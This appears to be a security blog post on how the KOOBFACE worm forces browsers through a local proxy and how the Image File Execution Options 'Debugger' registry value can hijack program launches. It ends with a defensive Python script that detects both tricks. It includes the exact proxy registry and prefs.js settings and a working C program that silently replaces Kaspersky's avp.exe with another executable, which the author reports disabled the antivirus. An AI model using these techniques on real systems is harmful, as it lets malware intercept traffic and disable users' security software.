I've recently read a research paper from Trend Micro on the KOOBFACE worm and I wanted to share the interesting way it redirects popular web browsers' traffic through the local proxy it installs. The Trend Micro paper can be found here: How KOOBFACE Makes Money
Internet Explorer
What you need to modify are these registry values (the key exists under both HKCU and HKLM):

[HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy"=dword:00000001
"ProxyEnable"=dword:00000001
"ProxyHttp1.1"=dword:00000000
"ProxyServer"="http://ProxyServername:ProxyPort"
"ProxyOverride"="<local>"

Note that these are WinINet settings rather than Internet Explorer's alone, so any other application that uses WinINet for HTTP will start sending its traffic through the proxy as well.
Reference: http://support.microsoft.com/kb/819961
Firefox
Modify the prefs.js file in the Firefox profile directory (under the current user's Application Data directory) and add the lines below. Firefox rewrites prefs.js when it exits, so the change has to be made while Firefox is not running, or written to user.js in the same directory, which Firefox reads at startup and never overwrites:
user_pref("network.proxy.http", "ProxyServer");
user_pref("network.proxy.http_port",ProxyPort);
user_pref("network.proxy.type", 1);
So it is really simple for malware to install a stealthy local proxy: with a few modifications to browser settings it can intercept, inspect and modify all the traffic our web browsers send or receive.
Today I came across a pretty interesting piece of information on a registry key that lets you specify initialization settings for a given executable name. In other words it is possible to make one application run whenever another one is started: for example a debugging application can be launched in place of the application the user actually executed, with the target executable's path passed to it as a command line argument. The registry key looks like this:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\exefile.exe]
"Debugger"="launchwiththis.exe"
Try to set up a new entry with notepad.exe as the key name and C:\WINDOWS\system32\calc.exe as the "Debugger" value.
This entry will launch the calculator EVERY time notepad is supposed to run, including whenever the user double-clicks any *.txt file, since the shell still resolves the file type to notepad.exe. Note that Windows appends the original command line to the Debugger value, so what actually starts is calc.exe with notepad's path and the file name as its arguments; notepad itself never runs unless the "debugger" launches it.
This little trick makes it extremely easy for malware authors to disable or take control over anti-virus software. I already checked if it works with Kaspersky Internet Security 2009 and it did. I made the system launch the calculator instead of avp.exe and restarted the machine. After I logged in, the calculator process was waiting for input and there was no sign of KIS2009. Of course malware may use explorer.exe instead of calc.exe to conceal its actions, or even implement its own executable that would inject the malware DLL into the AV process when it is launched. The most frightening thing is that Kaspersky's Active Protection, which monitors modifications of autostart registry data, is totally blind to the modification of the registry values I presented here. Therefore it's possible to write a trojan that would be able to operate from inside the AV process.
I know this registry key must have been discussed many times over the last few years, but it seems it is still posing a threat to computer security, so it's worth mentioning.
Here is a very short code snippet of an application that modifies these registry values to run calc.exe instead of avp.exe (it needs to run as an administrator, since the key lives under HKLM):
#include <stdio.h>
#include <string.h>
#include <windows.h>

int main( int argc, char* argv[] )
{
    HKEY key;
    /* Create (or open) the per-image subkey under Image File Execution Options. */
    if ( RegCreateKeyExA( HKEY_LOCAL_MACHINE,
                          "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\avp.exe",
                          0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, NULL, &key, NULL ) == ERROR_SUCCESS )
    {
        const char *dataval = "C:\\WINDOWS\\system32\\calc.exe";
        /* RegSetValueEx writes the named value "Debugger" on this key. The older
           RegSetValue would instead create a subkey called Debugger and set its
           default value, which the loader ignores. cbData includes the NUL. */
        LONG rc = RegSetValueExA( key, "Debugger", 0, REG_SZ,
                                  (const BYTE*)dataval, (DWORD)strlen( dataval ) + 1 );
        RegCloseKey( key );
        if ( rc == ERROR_SUCCESS )
        {
            printf( "OK!\n" );
            return 0;
        }
    }
    printf( "FAILED!\n" );
    return 1;
}
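Both tricks described in this post, the browser proxy settings and the Image File Execution Options "Debugger" value, leave footprints that are easy to check for offline. The following script is an added example written for this page; it is not code from the original post, the Trend Micro paper or any product. It parses the text of a .reg export and a Firefox prefs.js and flags IFEO entries whose debugger is not in a list of known debuggers, WinINet proxy settings that are enabled and point at the local machine, and a Firefox manual proxy pointing at the local machine. The KNOWN_DEBUGGERS list and the two sample inputs are constructed assumptions; the key paths are the ones from the post.

```python
"""Offline triage for IFEO "Debugger" hijacks and local-proxy browser settings.

Added example, not from the original post or the Trend Micro paper. Input is the
text of a .reg export (regedit / reg export) plus a Firefox prefs.js; the sample
inputs and the KNOWN_DEBUGGERS list below are constructed for the demonstration.
"""
import re

# Assumption: debuggers an administrator might legitimately register; tune per site.
KNOWN_DEBUGGERS = {"windbg.exe", "vsjitdebugger.exe", "ntsd.exe", "cdb.exe", "drwtsn32.exe"}

IFEO_PATH = "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\"
INET_PATH = "\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings"


def parse_reg(text):
    """Parse .reg text into {key_path: {value_name: data}}.

    Quoted strings (with backslash and quote escapes) become str, dword:XXXXXXXX
    becomes int, '@' is the default value. Other types are kept as raw text.
    """
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if (not line or line.startswith(";") or line.startswith("Windows Registry Editor")
                or line.upper().startswith("REGEDIT4")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        name, _, data = line.partition("=")
        name = "(Default)" if name == "@" else name.strip('"')
        if data.startswith('"') and data.endswith('"'):
            data = re.sub(r'\\(["\\])', r"\1", data[1:-1])  # undo .reg string escaping
        elif data.lower().startswith("dword:"):
            data = int(data[6:], 16)
        keys[current][name] = data
    return keys


def _exe_name(cmdline):
    """Lower-cased basename of the first token of a command line (handles quoted paths)."""
    cmdline = cmdline.strip()
    if not cmdline:
        return ""
    first = cmdline[1:].split('"', 1)[0] if cmdline.startswith('"') else cmdline.split()[0]
    return first.rsplit("\\", 1)[-1].lower()


def _is_local(proxy):
    """True if any host in a WinINet ProxyServer string ('host:port', 'http://host:port',
    'http=host:port;https=...') or a bare Firefox host is the local machine (IPv4 forms only)."""
    for part in re.split(r"[;\s]+", proxy):
        host = re.sub(r"^\w+://", "", re.sub(r"^\w+=", "", part)).split(":")[0].lower()
        if host == "localhost" or host.startswith("127."):
            return True
    return False


def find_ifeo_hijacks(keys):
    """(image, debugger) pairs whose IFEO Debugger is not a known debugger."""
    hits = []
    for path, values in keys.items():
        idx = path.lower().find(IFEO_PATH.lower())
        if idx == -1 or "Debugger" not in values:
            continue
        image = path[idx + len(IFEO_PATH):]
        if "\\" in image:  # deeper subkeys (e.g. PerfOptions) are not image names
            continue
        debugger = str(values["Debugger"])
        if _exe_name(debugger) not in KNOWN_DEBUGGERS:
            hits.append((image, debugger))
    return hits


def find_proxy_redirects(keys):
    """(key_path, ProxyServer) where WinINet proxying is enabled and points at this host."""
    hits = []
    for path, values in keys.items():
        if path.lower().endswith(INET_PATH.lower()) and values.get("ProxyEnable") == 1:
            server = str(values.get("ProxyServer", ""))
            if _is_local(server):
                hits.append((path, server))
    return hits


def find_firefox_local_proxy(prefs_js):
    """(host, port) if prefs.js sets a manual proxy (network.proxy.type 1) on this host, else None."""
    prefs = {m.group(1): m.group(3)
             for m in re.finditer(r'user_pref\("([^"]+)",\s*("?)([^"\)]*)\2\);', prefs_js)}
    if prefs.get("network.proxy.type") != "1":
        return None
    host, port = prefs.get("network.proxy.http", ""), prefs.get("network.proxy.http_port", "")
    return (host, int(port)) if host and port.isdigit() and _is_local(host) else None


# Constructed sample data: one legitimate windbg entry, one hijack, one local IE proxy.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe]
"Debugger"="C:\\WINDOWS\\system32\\calc.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe]
"Debugger"="\"C:\\Program Files\\Debugging Tools for Windows\\windbg.exe\" -g"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy"=dword:00000001
"ProxyEnable"=dword:00000001
"ProxyServer"="http://127.0.0.1:9090"
"ProxyOverride"="<local>"
'''

SAMPLE_PREFS = '''// Mozilla User Preferences (constructed sample)
user_pref("browser.startup.homepage", "about:home");
user_pref("network.proxy.http", "127.0.0.1");
user_pref("network.proxy.http_port", 9090);
user_pref("network.proxy.type", 1);
'''

if __name__ == "__main__":
    reg = parse_reg(SAMPLE_REG)
    for image, dbg in find_ifeo_hijacks(reg):
        print("IFEO hijack: %s -> %s" % (image, dbg))
    for path, server in find_proxy_redirects(reg):
        print("Local WinINet proxy: %s = %s" % (path, server))
    print("Firefox local proxy:", find_firefox_local_proxy(SAMPLE_PREFS))
```

To run it against a real machine, export the two keys with reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" ifeo.reg and reg export "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" inet.reg, then feed the file contents to parse_reg (reg export writes UTF-16 text, so open the files with encoding="utf-16"). A legitimate debugger that is not in KNOWN_DEBUGGERS will be reported too, which is the intended bias: every IFEO Debugger value deserves a look.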